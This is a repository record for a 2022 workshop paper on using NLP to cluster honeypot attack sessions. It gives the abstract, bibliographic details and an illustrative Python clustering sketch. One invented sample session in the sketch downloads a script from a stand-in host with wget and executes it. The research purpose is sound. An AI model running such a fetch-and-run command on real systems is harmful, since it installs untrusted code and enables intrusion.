CINECA IRIS Institutional Research Information System


Towards NLP-based Processing of Honeypot Logs

Boffa, M; Milan, G; Vassio, L; Drago, I; Mellia, M; Ben Houidi, Z

2022-01-01

Abstract

Honeypots are active sensors deployed to obtain information about attacks. In their search for vulnerabilities, attackers generate large volumes of logs, whose analysis is time-consuming and cumbersome. Here we evaluate whether Natural Language Processing (NLP) approaches can provide meaningful representations to find common traits in attackers' activity. We use a widely used SSH/Telnet honeypot to record more than 200 000 sessions, including 61 000 unique shell scripts, some containing sequences of more than 100 Bash commands. We first parse the sessions to separate Bash commands, options and parameters. Next, we project each session into a metric space, comparing two common NLP tools: Bag of Words and Word2Vec. Last, we apply a clustering algorithm to aggregate the sessions while offering an instrumental representation of the clustering process. In the end, we obtain a few tens of clusters that we analyze to explain the attackers' goals, e.g., obtaining system information, injecting malicious accounts, and downloading and running executables. Our work is a first step towards automatically identifying attack patterns on honeypots, thus effectively supporting security activities.
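The pipeline summarized in the abstract (parse, vectorize, cluster) can be illustrated with a minimal sketch. Everything below is an assumption made for illustration and is not the authors' implementation: the sample sessions are invented, the rule that tags a token as an option when it starts with "-" is a simplification, parameters are dropped from the Bag of Words vector by choice, and the greedy threshold clustering is a simple stand-in for whatever clustering algorithm the paper uses. Word2Vec is omitted because it requires training a model on a corpus.

```python
import math
import shlex
from collections import Counter

# Hypothetical sessions, invented for illustration (not taken from the dataset).
SESSIONS = [
    "uname -a; cat /proc/cpuinfo",
    "uname -a; cat /proc/meminfo",
    "cd /tmp; wget http://example.com/a.sh; chmod +x a.sh; sh a.sh",
]


def tokenize(session):
    """Split a session on ';' and tag each word as command, option or parameter."""
    tokens = []
    for command in session.split(";"):
        words = shlex.split(command)
        if not words:
            continue
        tokens.append(("cmd", words[0]))
        for word in words[1:]:
            # Simplifying assumption: anything starting with '-' is an option.
            kind = "opt" if word.startswith("-") else "param"
            tokens.append((kind, word))
    return tokens


def bag_of_words(tokens):
    """Count commands and options; parameters are ignored in this sketch."""
    return Counter(word for kind, word in tokens if kind != "param")


def cosine(a, b):
    """Cosine similarity between two sparse count vectors."""
    dot = sum(a[key] * b[key] for key in a.keys() & b.keys())
    norm_a = math.sqrt(sum(v * v for v in a.values()))
    norm_b = math.sqrt(sum(v * v for v in b.values()))
    return dot / (norm_a * norm_b) if norm_a and norm_b else 0.0


def greedy_clusters(vectors, threshold=0.8):
    """Assign each vector to the first cluster whose first member is similar enough."""
    clusters = []  # each cluster is a list of session indices
    for index, vector in enumerate(vectors):
        for cluster in clusters:
            if cosine(vector, vectors[cluster[0]]) >= threshold:
                cluster.append(index)
                break
        else:
            clusters.append([index])
    return clusters


vectors = [bag_of_words(tokenize(session)) for session in SESSIONS]
clusters = greedy_clusters(vectors)
print(clusters)  # [[0, 1], [2]]
```

In this toy input the two system-information sessions share the same commands and options and fall into one cluster, while the download-and-run session forms its own.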


Year: 2022
Event title: IEEE European Symposium on Security and Privacy Workshops (EuroS&PW)
Event location: Genova, Italy
Event date: 06-10 June 2022
Volume title: Proceedings of the 2022 IEEE European Symposium on Security and Privacy Workshops (EuroS&PW)
Publisher: IEEE
Pages (from): 314
Pages (to): 321
ISBN: 978-1-6654-9560-8
DOI: https://dx.doi.org/10.1109/EuroSPW55150.2022.00038
Keywords: Honeypots; NLP; Word2Vec; Bag of Words
All authors: Boffa, M; Milan, G; Vassio, L; Drago, I; Mellia, M; Ben Houidi, Z
Appears in types: 04A-Conference paper in volume

Files in this record:

File	Size	Format
0_main.pdf (Open access; Description: Article; File type: Preprint (first draft))	738.47 kB	Adobe PDF

Documents in IRIS are protected by copyright and all rights are reserved, unless otherwise indicated.

Use this identifier to cite or link to this document: https://hdl.handle.net/2318/1876801
